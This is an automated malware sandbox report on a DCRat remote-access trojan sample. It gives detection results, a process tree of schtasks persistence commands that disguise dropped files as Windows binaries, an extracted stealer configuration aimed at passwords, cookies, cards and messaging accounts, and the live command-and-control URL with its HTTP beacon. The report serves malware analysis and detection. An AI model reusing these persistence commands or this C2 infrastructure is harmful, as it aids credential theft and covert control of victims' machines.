Edit tour

Windows Analysis Report
cDouNOFXle.exe

Overview

General Information

Sample Name:	cDouNOFXle.exe
Analysis ID:	679544
MD5:	54172888b473f2515b13fe1e2032a112
SHA1:	fc4ff4d53a1ea6cfee9265840bfc1dda0ee8c1e6
SHA256:	05379ea4600304f51cffa8d1ee9e3b2931a69129f6bed14d45a500d966a71fca
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Yara detected DCRat

Creates processes via WMI

Machine Learning detection for sample

Machine Learning detection for dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Uses schtasks.exe or at.exe to add and modify task schedules

Drops PE files with benign system names

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to communicate with device drivers

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

File is packed with WinRar

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

System is w10x64

cDouNOFXle.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\cDouNOFXle.exe" MD5: 54172888B473F2515B13FE1E2032A112)

wscript.exe (PID: 5792 cmdline: "C:\Windows\System32\WScript.exe" "C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

cmd.exe (PID: 5824 cmdline: C:\Windows\system32\cmd.exe /c ""C:\comproviderRuntimecommon\DLLiR59GMmL352HHbgfc.bat" " MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

chainsavesref.exe (PID: 3372 cmdline: C:\comproviderRuntimecommon\chainsavesref.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)

schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5208 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Recovery\conhost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5296 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 9 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 1100 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 11 /tr "'C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

MrsUvRPGeImAhc.exe (PID: 3432 cmdline: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)

schtasks.exe (PID: 3056 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 6 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 2232 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhc" /sc ONLOGON /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "MrsUvRPGeImAhcM" /sc MINUTE /mo 7 /tr "'C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5800 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\winlogon.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 4592 cmdline: schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

MrsUvRPGeImAhc.exe (PID: 2756 cmdline: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)

schtasks.exe (PID: 2072 cmdline: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5100 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Recovery\explorer.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 4036 cmdline: schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Recovery\explorer.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 4200 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

explorer.exe (PID: 1820 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)

schtasks.exe (PID: 5304 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

explorer.exe (PID: 5580 cmdline: C:\Recovery\explorer.exe MD5: 4EAF964B744BD6801B5122AE1AFBBDE4)

schtasks.exe (PID: 3896 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5280 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 6024 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 5608 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 10 /tr "'C:\comproviderRuntimecommon\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 6056 cmdline: schtasks.exe /create /tn "ShellExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Recovery\ShellExperienceHost.exe'" /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

schtasks.exe (PID: 2292 cmdline: schtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\ShellExperienceHost.exe'" /rl HIGHEST /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)

cleanup

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000020.00000002.373237011.0000000002619000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.371238392.0000000002381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000010.00000002.330291471.0000000002CBB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000001E.00000002.378960692.00000000023C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000006.00000002.294012749.0000000002611000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000020.00000002.370984322.00000000025D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000010.00000002.328491076.0000000002C71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: chainsavesref.exe PID: 3372	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MrsUvRPGeImAhc.exe PID: 3432	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: MrsUvRPGeImAhc.exe PID: 2756	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: explorer.exe PID: 1820	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: explorer.exe PID: 5580	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 8 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: cDouNOFXle.exe	Virustotal: Detection: 53%	Perma Link
Source: cDouNOFXle.exe	Metadefender: Detection: 40%	Perma Link
Source: cDouNOFXle.exe	ReversingLabs: Detection: 60%

Antivirus / Scanner detection for submitted sample

Source: cDouNOFXle.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Recovery\ShellExperienceHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\winlogon.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\explorer.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\Recovery\conhost.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330
Source: C:\comproviderRuntimecommon\et1pu6VAlkUOY7GuC90A.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Avira: detection malicious, Label: HEUR/AGEN.1249330

Multi AV Scanner detection for dropped file

Source: C:\Recovery\ShellExperienceHost.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Recovery\ShellExperienceHost.exe	ReversingLabs: Detection: 70%
Source: C:\Recovery\conhost.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Recovery\conhost.exe	ReversingLabs: Detection: 70%
Source: C:\Recovery\explorer.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Recovery\explorer.exe	ReversingLabs: Detection: 70%
Source: C:\Recovery\winlogon.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Recovery\winlogon.exe	ReversingLabs: Detection: 70%
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Virustotal: Detection: 54%	Perma Link
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	ReversingLabs: Detection: 70%
Source: C:\Windows\Web\Screen\MrsUvRPGeImAhc.exe	ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe	ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe	ReversingLabs: Detection: 70%
Source: C:\comproviderRuntimecommon\chainsavesref.exe	ReversingLabs: Detection: 70%

Machine Learning detection for sample

Source: cDouNOFXle.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Recovery\ShellExperienceHost.exe	Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\RuntimeBroker.exe	Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\backgroundTaskHost.exe	Joe Sandbox ML: detected
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Joe Sandbox ML: detected
Source: C:\Recovery\winlogon.exe	Joe Sandbox ML: detected
Source: C:\Recovery\explorer.exe	Joe Sandbox ML: detected
Source: C:\comproviderRuntimecommon\chainsavesref.exe	Joe Sandbox ML: detected
Source: C:\Recovery\conhost.exe	Joe Sandbox ML: detected
Source: C:\Windows\Help\mui\0409\MrsUvRPGeImAhc.exe	Joe Sandbox ML: detected

Source: 0.3.cDouNOFXle.exe.5528b46.0.unpack	Avira: Label: VBS/Runner.VPG
Source: 0.3.cDouNOFXle.exe.5557b46.1.unpack	Avira: Label: VBS/Runner.VPG

Source: 00000017.00000002.361259028.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"l\":\"@\",\"w\":\"#\",\"I\":\"`\",\"Y\":\"$\",\"M\":\"%\",\"i\":\",\",\"D\":\"&\",\"N\":\"-\",\"5\":\" \",\"P\":\"~\",\"s\":\")\",\"K\":\"*\",\"3\":\";\",\"m\":\"^\",\"c\":\">\",\"Q\":\"<\",\"2\":\"(\",\"S\":\"_\",\"O\":\"!\",\"y\":\".\",\"0\":\"|\"}", "PCRT": "{\"l\":\"|\",\"6\":\"&\",\"G\":\"<\",\"I\":\"^\",\"0\":\")\",\"p\":\"!\",\"y\":\",\",\"n\":\".\",\"X\":\"*\",\"M\":\"$\",\"=\":\">\",\"9\":\" \",\"b\":\"~\",\"S\":\";\",\"d\":\"@\",\"Y\":\"(\",\"c\":\"#\",\"w\":\"`\",\"i\":\"-\",\"e\":\"%\",\"j\":\"_\"}", "TAG": "FUCKYOUTEST", "MUTEX": "DCR_MUTEX-02ykwxZSRSiKYAzrbrFg", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false}

Source: cDouNOFXle.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: cDouNOFXle.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: cDouNOFXle.exe

Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0006A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_0006A5F4
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0007B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_0007B8E0
Source: C:\Users\user\Desktop\cDouNOFXle.exe	Code function: 0_2_0008AAA8 FindFirstFileExA,	0_2_0008AAA8

Source: Joe Sandbox View

IP Address: 141.8.195.65 141.8.195.65

Source: global traffic	HTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /tolowprocessorGeneratortrack.php?rRmbiWWxEOd55k=WTgIsnKuV&e7d5ea1a013b440ebf41c5b405309b9e=b64e0d0fcd8b0e37eaa44643c1b6ab3c&94c8169d9b8cbbe19972e7f6bf4e65c1=AM5MjZxQmMhRjMzE2M5kTN2EWOwczYxYGN3UDM5YjZwM2YmRmN2EDO&rRmbiWWxEOd55k=WTgIsnKuV HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: a0702220.xsph.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 05 Aug 2022 22:53:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 05 Aug 2022 22:53:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69

Source: MrsUvRPGeImAhc.exe, 00000017.00000002.362876471.0000000003106000.00000004.00000800.00020000.00000000.sdmp, MrsUvRPGeImAhc.exe, 00000017.00000002.362535103.00000000030DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a0702220.xsph.ru
